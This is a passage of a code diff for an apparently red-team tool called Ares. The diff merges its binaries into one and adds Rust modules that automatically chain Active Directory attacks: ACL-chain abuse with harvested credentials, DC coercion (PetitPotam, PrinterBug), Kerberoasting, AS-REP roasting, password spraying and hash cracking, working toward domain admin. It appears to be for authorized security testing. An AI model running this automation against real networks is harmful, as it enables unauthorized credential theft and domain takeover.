"$WORKER_PODS" ] && [ -f "{{.BIN_DIR}}/ares-worker" ]; then - local_hash=$(shasum -a 256 "{{.BIN_DIR}}/ares-worker" | awk '{print $1}') - for pod in $WORKER_PODS; do - TOTAL_CHECKED=$((TOTAL_CHECKED + 1)) - - result=$(check_binary "ares-worker" "$pod" "$local_hash") - case "$result" in - OK) - echo -e "{{.SUCCESS}} ares-worker @ $pod: OK" - TOTAL_MATCH=$((TOTAL_MATCH + 1)) - ;; - MISSING) - echo -e "{{.WARN}} ares-worker @ $pod: MISSING" - TOTAL_MISSING=$((TOTAL_MISSING + 1)) - echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" - ;; - DIFFERS) - echo -e "{{.ERROR}} ares-worker @ $pod: DIFFERS" - TOTAL_DIFFER=$((TOTAL_DIFFER + 1)) - echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" - ;; - esac - done - fi - echo "" echo "========================================" echo -e "{{.INFO}} Summary: $TOTAL_CHECKED checked, $TOTAL_MATCH match, $TOTAL_DIFFER differ, $TOTAL_MISSING missing" @@ -1092,7 +1054,7 @@ tasks: BIN_DIR: 'target/{{.RUST_TARGET}}/release' REMOTE_BIN_DIR: '/usr/local/bin' preconditions: - - sh: test -f {{.BIN_DIR}}/ares-cli + - sh: test -f {{.BIN_DIR}}/ares msg: "Binary not found. Run: task remote:rust:build" cmds: - | @@ -1124,31 +1086,17 @@ tasks: FAILED=0 - # Deploy to orchestrator pods: ares-cli + ares-orchestrator - for pod in $ORCH_PODS; do - echo -e "{{.INFO}} Deploying to orchestrator: $pod" - for bin in ares-cli ares-orchestrator; do - if kubectl cp "{{.BIN_DIR}}/$bin" "$pod:{{.REMOTE_BIN_DIR}}/$bin" \ - -n {{.K8S_NAMESPACE}} 2>/dev/null; then - # Make executable - kubectl exec -n {{.K8S_NAMESPACE}} "$pod" -- chmod +x "{{.REMOTE_BIN_DIR}}/$bin" 2>/dev/null - echo -e "{{.SUCCESS}} $bin -> $pod" - else - echo -e "{{.ERROR}} $bin -> $pod FAILED" - FAILED=$((FAILED + 1)) - fi - done - done - - # Deploy to worker pods: ares-worker only - for pod in $WORKER_PODS; do - echo -e "{{.INFO}} Deploying to worker: $pod" - if kubectl cp "{{.BIN_DIR}}/ares-worker" "$pod:{{.REMOTE_BIN_DIR}}/ares-worker" \ + # Deploy single ares binary to all pods + ALL_PODS="$ORCH_PODS $WORKER_PODS" + for pod in $ALL_PODS; do + [ -z "$pod" ] && continue + echo -e "{{.INFO}} Deploying to: $pod" + if kubectl cp "{{.BIN_DIR}}/ares" "$pod:{{.REMOTE_BIN_DIR}}/ares" \ -n {{.K8S_NAMESPACE}} 2>/dev/null; then - kubectl exec -n {{.K8S_NAMESPACE}} "$pod" -- chmod +x "{{.REMOTE_BIN_DIR}}/ares-worker" 2>/dev/null - echo -e "{{.SUCCESS}} ares-worker -> $pod" + kubectl exec -n {{.K8S_NAMESPACE}} "$pod" -- chmod +x "{{.REMOTE_BIN_DIR}}/ares" 2>/dev/null + echo -e "{{.SUCCESS}} ares -> $pod" else - echo -e "{{.ERROR}} ares-worker -> $pod FAILED" + echo -e "{{.ERROR}} ares -> $pod FAILED" FAILED=$((FAILED + 1)) fi done @@ -1183,22 +1131,11 @@ tasks: --field-selector=status.phase=Running \ -o jsonpath='{.items[0].metadata.name}' 2>/dev/null || true) - # Check orchestrator - if [ -n "$ORCH_POD" ]; then - echo -e "\n{{.INFO}} Orchestrator: $ORCH_POD" - for bin in ares-cli ares-orchestrator; do - VER=$(kubectl exec -n {{.K8S_NAMESPACE}} "$ORCH_POD" -- \ - $bin --version 2>/dev/null || echo "NOT FOUND") - echo " $bin: $VER" - done - fi - - # Check workers + # Check all pods for pod in $ALL_PODS; do - [ "$pod" = "$ORCH_POD" ] && continue VER=$(kubectl exec -n {{.K8S_NAMESPACE}} "$pod" -- \ - ares-worker --version 2>/dev/null || echo "NOT FOUND") - echo " $pod: ares-worker $VER" + ares --version 2>/dev/null || echo "NOT FOUND") + echo " $pod: $VER" done rust:deploy:config: diff --git a/.taskfiles/remote/orchestrator-wrapper-patch.json b/.taskfiles/remote/orchestrator-wrapper-patch.json index 2a8a83fa..9ee1be92 100644 --- a/.taskfiles/remote/orchestrator-wrapper-patch.json +++ b/.taskfiles/remote/orchestrator-wrapper-patch.json @@ -8,7 +8,7 @@ "op": "replace", "path": "/spec/template/spec/containers/0/args", "value": [ - "echo \"ares-orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares-cli ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n echo \"Starting operation: ${OP_ID:-unknown}\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares-orchestrator\n status=$?\n echo \"Operation ${OP_ID:-unknown} exited with status $status\" >&2\n fi\ndone" + "echo \"ares orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n echo \"Starting operation: ${OP_ID:-unknown}\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares orchestrator\n status=$?\n echo \"Operation ${OP_ID:-unknown} exited with status $status\" >&2\n fi\ndone" ] } ] diff --git a/.taskfiles/remote/orchestrator-wrapper-patch.yaml b/.taskfiles/remote/orchestrator-wrapper-patch.yaml index e8c04913..a6f9674b 100644 --- a/.taskfiles/remote/orchestrator-wrapper-patch.yaml +++ b/.taskfiles/remote/orchestrator-wrapper-patch.yaml @@ -9,14 +9,14 @@ spec: - -c args: - | - echo "ares-orchestrator queue dispatcher starting" >&2 + echo "ares orchestrator queue dispatcher starting" >&2 while true; do - OP_REQUEST=$(RUST_LOG=error ares-cli ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true) + OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true) if [ -n "$OP_REQUEST" ]; then OP_ID=$(printf '%s\n' "$OP_REQUEST" | sed -n 's/.*"operation_id"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p') echo "Starting operation: ${OP_ID:-unknown}" >&2 export ARES_OPERATION_ID="$OP_REQUEST" - ares-orchestrator + ares orchestrator status=$? echo "Operation ${OP_ID:-unknown} exited with status $status" >&2 fi diff --git a/.taskfiles/remote/orchestrator-wrapper.sh b/.taskfiles/remote/orchestrator-wrapper.sh index 4c4e19d6..b5014b0d 100755 --- a/.taskfiles/remote/orchestrator-wrapper.sh +++ b/.taskfiles/remote/orchestrator-wrapper.sh @@ -1,12 +1,12 @@ #!/bin/sh -echo "ares-orchestrator queue dispatcher starting" >&2 +echo "ares orchestrator queue dispatcher starting" >&2 while true; do - OP_REQUEST=$(RUST_LOG=error ares-cli ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true) + OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true) if [ -n "$OP_REQUEST" ]; then OP_ID=$(printf '%s\n' "$OP_REQUEST" | sed -n 's/.*"operation_id"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p') echo "Starting operation: ${OP_ID:-unknown}" >&2 export ARES_OPERATION_ID="$OP_REQUEST" - ares-orchestrator + ares orchestrator status=$? echo "Operation ${OP_ID:-unknown} exited with status $status" >&2 fi diff --git a/Cargo.lock b/Cargo.lock index 7ca5a6a0..df957d00 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -112,15 +112,20 @@ version = "0.1.0" dependencies = [ "anyhow", "ares-core", + "ares-llm", + "ares-tools", + "async-trait", "chrono", "clap", "dotenvy", "redis", "regex", + "rstest", "serde", "serde_json", "serde_yaml", "sqlx", + "thiserror 2.0.18", "tokio", "tracing", "tracing-subscriber", @@ -176,28 +181,6 @@ dependencies = [ "uuid", ] -[[package]] -name = "ares-orchestrator" -version = "0.1.0" -dependencies = [ - "anyhow", - "ares-core", - "ares-llm", - "ares-tools", - "async-trait", - "chrono", - "redis", - "regex", - "rstest", - "serde", - "serde_json", - "serde_yaml", - "tokio", - "tracing", - "tracing-subscriber", - "uuid", -] - [[package]] name = "ares-tools" version = "0.1.0" @@ -219,27 +202,6 @@ dependencies = [ "uuid", ] -[[package]] -name = "ares-worker" -version = "0.1.0" -dependencies = [ - "anyhow", - "ares-core", - "ares-llm", - "ares-tools", - "async-trait", - "chrono", - "redis", - "serde", - "serde_json", - "serde_yaml", - "thiserror 2.0.18", - "tokio", - "tracing", - "tracing-subscriber", - "uuid", -] - [[package]] name = "async-lock" version = "3.4.2" diff --git a/Cargo.toml b/Cargo.toml index bcbf3369..89032d3a 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [workspace] resolver = "2" -members = ["ares-core", "ares-cli", "ares-llm", "ares-orchestrator", "ares-worker", "ares-tools"] +members = ["ares-core", "ares-cli", "ares-llm", "ares-tools"] [workspace.dependencies] serde = { version = "1", features = ["derive"] } diff --git a/Taskfile.yaml b/Taskfile.yaml index ac366251..53e402ed 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -84,7 +84,7 @@ vars: # Config file (single source of truth for model assignments) ARES_CONFIG: '{{.ARES_CONFIG | default "./config/ares.yaml"}}' # Rust CLI binary - ARES_CLI: '{{.ARES_CLI | default "./target/release/ares-cli"}}' + ARES_CLI: '{{.ARES_CLI | default "./target/release/ares"}}' # Infrastructure K8S_NAMESPACE: '{{.K8S_NAMESPACE | default "attack-simulation"}}' TARGET_PROFILE: '{{.TARGET_PROFILE | default "lab"}}' @@ -237,7 +237,7 @@ tasks: echo "" echo "Environment:" echo " Rust: $(rustc --version 2>/dev/null || echo 'not installed')" - echo " ares-cli: $({{.ARES_CLI}} --version 2>/dev/null || echo 'not built — run task rust:release')" + echo " ares: $({{.ARES_CLI}} --version 2>/dev/null || echo 'not built — run task rust:release')" echo "" echo "Configuration:" echo " Platform: {{.DREADNODE_SERVER_URL}}" diff --git a/ares-cli/Cargo.toml b/ares-cli/Cargo.toml index 35249d2b..2d74c6ec 100644 --- a/ares-cli/Cargo.toml +++ b/ares-cli/Cargo.toml @@ -2,29 +2,41 @@ name = "ares-cli" version = "0.1.0" edition = "2021" -description = "CLI for the Ares red team orchestration system" +description = "Unified binary for the Ares red team orchestration system" [[bin]] -name = "ares-cli" +name = "ares" path = "src/main.rs" [features] default = ["blue"] -blue = ["ares-core/blue"] +blue = ["ares-core/blue", "ares-llm/blue", "ares-tools/blue"] [dependencies] ares-core = { path = "../ares-core", features = ["telemetry"] } +ares-llm = { path = "../ares-llm" } +ares-tools = { path = "../ares-tools" } serde = { workspace = true } serde_json = { workspace = true } +serde_yaml = { workspace = true } tokio = { workspace = true } redis = { workspace = true } chrono = { workspace = true } tracing = { workspace = true } tracing-subscriber = { workspace = true } clap = { workspace = true } -serde_yaml = { workspace = true } anyhow = { workspace = true } uuid = { workspace = true } sqlx = { workspace = true } regex = { workspace = true } dotenvy = "0.15" +async-trait = "0.1" +thiserror = { workspace = true } + +[build-dependencies] +serde = { version = "1", features = ["derive"] } +serde_yaml = "0.9" + +[dev-dependencies] +tokio = { workspace = true } +rstest = "0.26" diff --git a/ares-cli/build.rs b/ares-cli/build.rs new file mode 100644 index 00000000..d64a2249 --- /dev/null +++ b/ares-cli/build.rs @@ -0,0 +1,95 @@ +//! Build script — generates `tools_for_role()` from `tools.yaml`. +//! +//! The generated file is written to `$OUT_DIR/tool_tables.rs` and +//! included by `tool_check.rs` via `include!`. + +use std::collections::BTreeMap; +use std::env; +use std::fs; +use std::io::Write; +use std::path::Path; + +use serde::Deserialize; + +#[derive(Deserialize)] +struct ToolsFile { + roles: BTreeMap, +} + +#[derive(Deserialize)] +struct RoleDef { + tools: Vec, +} + +#[derive(Deserialize)] +struct ToolCategory { + binaries: Vec, +} + +fn main() { + let manifest_dir = env::var("CARGO_MANIFEST_DIR").unwrap(); + let yaml_path = Path::new(&manifest_dir) + .parent() // workspace root + .unwrap() + .join("tools.yaml"); + + println!("cargo::rerun-if-changed={}", yaml_path.display()); + + let yaml_content = fs::read_to_string(&yaml_path).unwrap_or_else(|e| { + panic!("Failed to read {}: {e}", yaml_path.display()); + }); + + let tools_file: ToolsFile = serde_yaml::from_str(&yaml_content).unwrap_or_else(|e| { + panic!("Failed to parse {}: {e}", yaml_path.display()); + }); + + let out_dir = env::var("OUT_DIR").unwrap(); + let dest = Path::new(&out_dir).join("tool_tables.rs"); + let mut f = fs::File::create(&dest).unwrap(); + + // Generate WORKER_ROLES constant (used in tests). + let role_names: Vec<&str> = tools_file.roles.keys().map(|s| s.as_str()).collect(); + writeln!(f, "/// All worker roles that have tool requirements.").unwrap(); + writeln!(f, "#[cfg(test)]").unwrap(); + writeln!(f, "const WORKER_ROLES: &[&str] = &[").unwrap(); + for role in &role_names { + writeln!(f, " {role:?},").unwrap(); + } + writeln!(f, "];\n").unwrap(); + + // Generate tools_for_role(). + writeln!( + f, + "/// Tools expected on each worker role's container image." + ) + .unwrap(); + writeln!(f, "///").unwrap(); + writeln!( + f, + "/// Auto-generated from `tools.yaml` — do not edit by hand." + ) + .unwrap(); + writeln!( + f, + "fn tools_for_role(role: &str) -> &'static [&'static str] {{" + ) + .unwrap(); + writeln!(f, " match role {{").unwrap(); + + for (role, def) in &tools_file.roles { + let binaries: Vec<&str> = def + .tools + .iter() + .flat_map(|cat| cat.binaries.iter().map(|s| s.as_str())) + .collect(); + writeln!(f, " {role:?} => &[").unwrap(); + for bin in &binaries { + writeln!(f, " {bin:?},").unwrap(); + } + writeln!(f, " ],").unwrap(); + } + + writeln!(f, " _ => &[],").unwrap(); + writeln!(f, " }}").unwrap(); + writeln!(f, "}}").unwrap(); +} diff --git a/ares-cli/src/cli/mod.rs b/ares-cli/src/cli/mod.rs index cb25bd97..4b3df31e 100644 --- a/ares-cli/src/cli/mod.rs +++ b/ares-cli/src/cli/mod.rs @@ -16,8 +16,8 @@ pub(crate) use blue::BlueCommands; #[derive(Parser)] #[command( - name = "ares-cli", - about = "Ares red team orchestration CLI", + name = "ares", + about = "Ares red team orchestration system", version, propagate_version = true )] @@ -76,4 +76,10 @@ pub(crate) enum Commands { /// Configuration management (single source of truth) #[command(subcommand)] Config(ConfigCommands), + + /// Run the orchestrator (long-running service) + Orchestrator, + + /// Run a worker (task executor) + Worker, } diff --git a/ares-cli/src/main.rs b/ares-cli/src/main.rs index d1d5f9a3..a59305a1 100644 --- a/ares-cli/src/main.rs +++ b/ares-cli/src/main.rs @@ -1,7 +1,7 @@ -//! Ares CLI — unified command-line interface for the Ares red team orchestration system. +//! Ares — unified binary for the Ares red team orchestration system. //! -//! Replaces the Python CLI scripts (cli_ops.py, cli_blue_ops.py, cli_history.py) -//! with a single native binary. Pure Redis/Postgres client, no Python interop. +//! Consolidates CLI, orchestrator, and worker into a single binary with +//! subcommands: `ares ops`, `ares orchestrator`, `ares worker`, etc. #[cfg(feature = "blue")] mod blue; @@ -11,9 +11,11 @@ mod dedup; mod detection; mod history; mod ops; +mod orchestrator; mod redis_conn; mod secrets; mod util; +mod worker; mod transport; @@ -93,5 +95,7 @@ async fn run(cli: Cli) -> Result<()> { Commands::Blue(cmd) => blue::run_blue(cmd, cli.redis_url).await, Commands::History(cmd) => history::run_history(cmd).await, Commands::Config(cmd) => config::run_config(cmd), + Commands::Orchestrator => orchestrator::run().await, + Commands::Worker => worker::run().await, } } diff --git a/ares-cli/src/orchestrator/automation/acl.rs b/ares-cli/src/orchestrator/automation/acl.rs new file mode 100644 index 00000000..a8b9e253 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/acl.rs @@ -0,0 +1,149 @@ +//! auto_acl_chain_follow -- dispatch ACL chain steps using available creds. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Follows ACL chains from BloodHound results, dispatching each step when +/// credentials for the source user are available. +/// Interval: 30s. Each chain is a JSON array of steps; we find the first +/// undispatched step whose source user has known credentials and dispatch it. +pub async fn auto_acl_chain_follow( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Skip if domain admin already achieved + { + let state = dispatcher.state.read().await; + if state.has_domain_admin { + continue; + } + } + + // Collect work items: (dedup_key, chain_step, credential) + let work: Vec<(String, serde_json::Value, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + + if state.acl_chains.is_empty() { + continue; + } + + let mut items = Vec::new(); + + for (chain_idx, chain) in state.acl_chains.iter().enumerate() { + // Each chain is expected to be a JSON array of step objects + let steps = match chain.as_array() { + Some(s) => s, + None => { + // Or it might be an object with a "steps" field + match chain.get("steps").and_then(|v| v.as_array()) { + Some(s) => s, + None => continue, + } + } + }; + + for (step_idx, step) in steps.iter().enumerate() { + let dedup_key = format!("chain:{}:step:{}", chain_idx, step_idx); + + // Skip already dispatched steps + if state.dispatched_acl_steps.contains(&dedup_key) { + continue; + } + if state.is_processed(DEDUP_ACL_STEPS, &dedup_key) { + continue; + } + + // Get the source user for this step + let source_user = step + .get("source") + .or_else(|| step.get("source_user")) + .or_else(|| step.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + let source_domain = step + .get("source_domain") + .or_else(|| step.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + + if source_user.is_empty() { + continue; + } + + // Find credential for the source user + let cred = state.credentials.iter().find(|c| { + c.username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || c.domain.to_lowercase() == source_domain.to_lowercase()) + }); + + if let Some(cred) = cred { + items.push((dedup_key, step.clone(), cred.clone())); + } + + // Only dispatch the first undispatched step per chain + break; + } + } + + items + }; + + // Dispatch each collected step + for (dedup_key, step, cred) in work { + let payload = json!({ + "technique": "acl_chain_step", + "step": step, + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + match dispatcher + .throttled_submit("acl_chain_step", "acl", payload, 4) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + step_key = %dedup_key, + "ACL chain step dispatched" + ); + // Mark as dispatched in both in-memory set and dedup + { + let mut state = dispatcher.state.write().await; + state.dispatched_acl_steps.insert(dedup_key.clone()); + state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone()); + } + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key) + .await; + } + Ok(None) => {} // deferred or throttled + Err(e) => warn!(err = %e, "Failed to dispatch ACL chain step"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/adcs.rs b/ares-cli/src/orchestrator/automation/adcs.rs new file mode 100644 index 00000000..4a9022d3 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/adcs.rs @@ -0,0 +1,79 @@ +//! auto_adcs_enumeration -- detect ADCS servers via CertEnroll share. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Detects ADCS servers by looking for CertEnroll shares and dispatches certipy_find. +/// Interval: 30s. Matches Python `_auto_adcs_enumeration`. +pub async fn auto_adcs_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Find CertEnroll shares on unprocessed hosts + get a credential + let work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + let cred = match state + .credentials + .iter() + .find(|c| { + !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + state + .shares + .iter() + .filter(|s| s.name.to_lowercase() == "certenroll") + .filter(|s| !state.is_processed(DEDUP_ADCS_SERVERS, &s.host)) + .map(|s| { + let domain = state.domains.first().cloned().unwrap_or_default(); + (s.host.clone(), domain, cred.clone()) + }) + .collect() + }; + + for (host_ip, domain, cred) in work { + match dispatcher + .request_certipy_find(&host_ip, &domain, &cred) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, host = %host_ip, "ADCS enumeration dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ADCS_SERVERS, host_ip.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &host_ip) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch ADCS enumeration"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/bloodhound.rs b/ares-cli/src/orchestrator/automation/bloodhound.rs new file mode 100644 index 00000000..8b805cea --- /dev/null +++ b/ares-cli/src/orchestrator/automation/bloodhound.rs @@ -0,0 +1,81 @@ +//! auto_bloodhound -- BloodHound collection per domain. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use ares_llm::routing::find_domain_credential; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches BloodHound collection for each discovered domain. +/// Interval: 30s. Matches Python `_auto_bloodhound`. +/// +/// Selects the best credential per domain (same-domain preferred, with +/// trust-scope enforcement) instead of using a single global credential. +pub async fn auto_bloodhound(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + if state.credentials.is_empty() { + continue; + } + + state + .domains + .iter() + .filter(|d| !state.is_processed(DEDUP_BLOODHOUND_DOMAINS, d)) + .filter_map(|domain| { + let dc_ip = state.domain_controllers.get(domain).cloned()?; + // Select best credential for this specific domain + let cred = find_domain_credential( + domain, + &state.credentials, + &state.netbios_to_fqdn, + &state.trusted_domains, + ); + match cred { + Some(c) => Some((domain.clone(), dc_ip, c.clone())), + None => { + debug!(domain = %domain, "No valid credential for BloodHound"); + None + } + } + }) + .collect() + }; + + for (domain, dc_ip, cred) in work { + match dispatcher.request_bloodhound(&domain, &dc_ip, &cred).await { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "BloodHound collection dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_BLOODHOUND_DOMAINS, domain.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_BLOODHOUND_DOMAINS, &domain) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch BloodHound"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/coercion.rs b/ares-cli/src/orchestrator/automation/coercion.rs new file mode 100644 index 00000000..1e89f4f8 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/coercion.rs @@ -0,0 +1,78 @@ +//! auto_coercion -- trigger ESC8 relay and DC coercion. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Triggers coercion attacks when ADCS ESC8 servers or unconstrained delegation hosts exist. +/// Interval: 30s. Matches Python `_auto_coercion`. +pub async fn auto_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Coerce DCs that haven't been coerced yet + let work: Vec<(String, String)> = { + let state = dispatcher.state.read().await; + // Find any host with unconstrained delegation as a listener + let _listener = state.hosts.iter().find(|h| { + h.roles + .iter() + .any(|r| r.to_lowercase().contains("unconstrained")) + }); + + state + .domain_controllers + .iter() + .filter(|(_, dc_ip)| !state.is_processed(DEDUP_COERCED_DCS, dc_ip)) + .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) + .collect() + }; + + for (domain, dc_ip) in work { + // Find a listener IP for the coercion (any host we own) + let listener_ip = { + let state = dispatcher.state.read().await; + state.hosts.iter().find(|h| h.owned).map(|h| h.ip.clone()) + }; + + let listener = match listener_ip { + Some(ip) => ip, + None => continue, + }; + + match dispatcher + .request_coercion(&dc_ip, &listener, &["petitpotam", "printerbug"]) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, dc = %dc_ip, domain = %domain, "DC coercion dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_COERCED_DCS, dc_ip.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_COERCED_DCS, &dc_ip) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch coercion"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/crack.rs b/ares-cli/src/orchestrator/automation/crack.rs new file mode 100644 index 00000000..84a998fe --- /dev/null +++ b/ares-cli/src/orchestrator/automation/crack.rs @@ -0,0 +1,75 @@ +//! auto_crack_dispatch -- submit crack tasks for new hashes. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{debug, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +use super::crack_dedup_key; + +/// Scans for uncracked hashes and submits crack tasks. +/// Interval: 15s. Matches Python `_auto_crack_dispatch`. +pub async fn auto_crack_dispatch(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(15)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Collect unprocessed hashes + let work: Vec<(String, ares_core::models::Hash)> = { + let state = dispatcher.state.read().await; + state + .hashes + .iter() + .filter(|h| h.cracked_password.is_none()) + .filter_map(|h| { + let dedup = crack_dedup_key(h); + if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { + None + } else { + Some((dedup, h.clone())) + } + }) + .collect() + }; + + // Serialize crack tasks: hashcat only allows one instance at a time. + // Skip this tick if a cracker task is already running. + if dispatcher.tracker.count_for_role("cracker").await > 0 { + debug!("Crack task already active, skipping dispatch this tick"); + continue; + } + + // Only dispatch one crack task per tick to avoid hashcat PID conflicts. + // Remaining hashes will be picked up on subsequent ticks. + if let Some((dedup_key, hash)) = work.into_iter().next() { + match dispatcher.request_crack(&hash).await { + Ok(Some(task_id)) => { + debug!(task_id = %task_id, hash_type = %hash.hash_type, "Crack task dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CRACK_REQUESTS, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CRACK_REQUESTS, &dedup_key) + .await; + } + Ok(None) => {} // deferred or throttled + Err(e) => warn!(err = %e, "Failed to dispatch crack task"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/credential_access.rs b/ares-cli/src/orchestrator/automation/credential_access.rs new file mode 100644 index 00000000..fcfed9aa --- /dev/null +++ b/ares-cli/src/orchestrator/automation/credential_access.rs @@ -0,0 +1,479 @@ +//! auto_credential_access -- kerberoast, AS-REP roast, password spray. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Complex credential access automation: kerberoast, AS-REP roast, password spray. +/// Interval: 15s + Notify wake. Matches Python `_auto_credential_access`. +pub async fn auto_credential_access( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let notify = dispatcher.credential_access_notify.clone(); + let mut interval = tokio::time::interval(Duration::from_secs(15)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = notify.notified() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // --- AS-REP Roast: one per domain (unauthenticated — no credentials required) --- + let asrep_work: Vec<(String, String)> = { + let state = dispatcher.state.read().await; + state + .domains + .iter() + .filter(|d| !state.is_processed(DEDUP_ASREP_DOMAINS, d)) + .filter_map(|domain| { + // Try DC map first, then fall back to target_ips[0] + let dc_ip = state + .domain_controllers + .get(domain) + .cloned() + .or_else(|| state.target_ips.first().cloned())?; + Some((domain.clone(), dc_ip)) + }) + .collect() + }; + + for (domain, dc_ip) in asrep_work { + let payload = json!({ + "techniques": ["kerberos_user_enum_noauth", "asrep_roast", "username_as_password"], + "target_ip": dc_ip, + "domain": domain, + }); + + match dispatcher + 